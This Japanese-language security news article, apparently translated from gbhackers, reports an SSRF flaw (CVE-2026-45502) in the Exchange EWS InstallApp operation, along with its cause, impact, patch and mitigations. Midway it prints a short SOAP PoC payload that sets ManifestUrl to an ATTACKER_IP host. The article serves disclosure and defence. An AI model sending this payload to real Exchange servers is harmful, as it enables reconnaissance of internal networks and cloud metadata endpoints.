PoC Released for Microsoft Exchange Server EWS InstallApp SSRF Vulnerability
2026/06/24 gbhackers — Microsoft の Exchange Web Services (EWS) における、InstallApp 操作に存在するサーバーサイド・リクエスト・フォージェリ (SSRF) の脆弱性 CVE-2026-45502 に対する PoC が公開された。この脆弱性は、2026年6月のセキュリティ更新プログラムを適用していない組織にリスクをもたらすものである。この脆弱性の影響を受けるのは、Exchange Server 2016 CU23/2019 CU14/CU15/Exchange Server Subscription Edition RTM である。

認証済みのメールボックス・ユーザーであれば、InstallApp SOAP 呼び出しにおける ManifestUrl パラメータの悪用により、攻撃者が制御する内部または外部エンドポイントへ向けた、サーバからの HTTP リクエストの送信が可能になる。
この脆弱性の攻撃ベクターは、ネットワーク/低複雑度/低権限/ユーザー操作不要であるが、Microsoft は機密性への影響が限定的であることを根拠に、CVSS 3.1 スコア 5.0 (Medium) と評価している。
Aretiq の報告によると、CVSS 4.0 評価ではスコア 2.3 (Low) が割り当てられているが、PoC エクスプロイトの存在に加えて、機密性の高いネットワーク構成における潜在的なリスクがあるとされる。
この脆弱性は、EWS アドインのインストール時にユーザーが指定する ManifestUrl 値の処理における、SynchronousDownloadData.DownloadDataFromUri() ルーチンでの URL 検証の不備に起因する。
オンプレミス環境の Exchange では、イントラネット・アドレスに対する SSRF チェックが常に false に設定される、クラウド固有の isBposUser フラグが用いられる。その結果として、内部アドレスをブロックするロジックが機能せず、サーバは認証済みユーザーから提供された任意の URL を信頼することになる。
このロジック上の欠陥により、Exchange はネットワーク・プロキシとして機能してしまい、サーバの特権的なネットワーク位置から、内部 HTTP サービス/169.254.169.254 などのメタデータ・エンドポイントや、その他のアクセス制限されたリソースへのアクセスを許すことになる。
さらに、この SSRF は、主にブラインド型であるが、レスポンスの挙動/HTTP エラー・コード/応答時間を利用する研究者は、内部サービスをマッピングし、その到達可能性を確認できることを実証している。これにより、内部偵察を行うための信頼性の高い手法が確立され、他の脆弱性との連鎖に至る可能性がある。
悪用可能性を示すため、研究者は単純な HTTP リスナーを起動し、そのリスナーを指す ManifestUrl を取り込むように細工された、EWS InstallApp リクエストを送信する PoC ワークフローを公開している。これにより、Exchange サーバが受信コールバックを開始する際の、SSRF の成立を確認できる。
安全性と簡潔さのため、完全な自動化を省略した最小限の疑似コード形式の PoC フラグメントは、以下のように表現できる。
# Minimal PoC sketch (for lab validation only)soap_body = """<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">> <soap:Body>> <m:InstallApp>> <m:ManifestUrl>>http://ATTACKER_IP:8888/ssrf-test</m:ManifestUrl>> </m:InstallApp>> </soap:Body>></soap:Envelope>>"""# Send SOAP body to https://EXCHANGE/EWS/Exchange.asmx with authenticated EWS request
脆弱な環境では、Exchange サーバは指定された URL に対して HTTP GET リクエストを実行し、”corr = <guid>” の相関パラメータを追加する場合が多い。対照的に、パッチ適用済みシステムでは、アウトバウンド接続の確立前にリクエストが拒否される。Exchange サーバが広範な east-west トラフィック可視性を持つ環境において、このような PoC が日和見的な探索で悪用され、レッド・チームにより調査される可能性が高まる。
Microsoft は、2026年6月9日のパッチ・チューズデーにおいて、脆弱性 CVE-2026-45502 に対処している。Exchange Server Subscription Edition 向けには KB5094139 が提供されており、Exchange Server 2016/2019 向けにも対応するセキュリティ更新プログラムがリリースされている。
この修正では、すべてのデプロイメントにおいて isBposUser に依存していた制限ロジックが、ManifestUrlValidation を強制する “feature-flag” 駆動型モデルへと置き換えられている。さらに、ManifestUrlCheck が導入されており、デフォルトでは “officeclient.microsoft.com” などの信頼されたディスティネーションのみを指定する、許可リストとして機能する。ただし管理者は、必要に応じてエントリを追加できる。
ユーザー組織にとって必要なことは、自社の Exchange ビルドが Microsoft のガイダンスおよびサードパーティ・アドバイザリで示される修正版であることの確認である。これらのビルドより古いインスタンスは、脆弱なものとして扱う必要がある。
それと並行して、攻撃の前提条件として、有効な認証情報が必要なことにも対処すべきである。防御側に対して強く推奨されるのは、Exchange サーバからのアウトバウンド接続の厳格な制限/異常な HTTP トラフィックの監視/EWS エンドポイントへの厳格なアクセス制御の適用である。
訳者後書:この脆弱性 CVE-2026-45502 は、アドインのインストール時にユーザーが指定する URL 検証の不備に起因します。オンプレミス環境において、内部アドレスをブロックするための確認フラグが正しく機能しないため、サーバが任意の URL を信頼してしまいます。その結果として、サーバがネットワークプロキシのように動作し、本来アクセスできない内部のサービスやリソースへの接続に至ります。 認証されたユーザーからのリクエストがきっかけとなるため、内部のネットワークが探索されるリスクがあります。ご利用のチームは、ご注意ください。よろしければ、Exchange での検索結果も、ご参照ください。
You must be logged in to post a comment.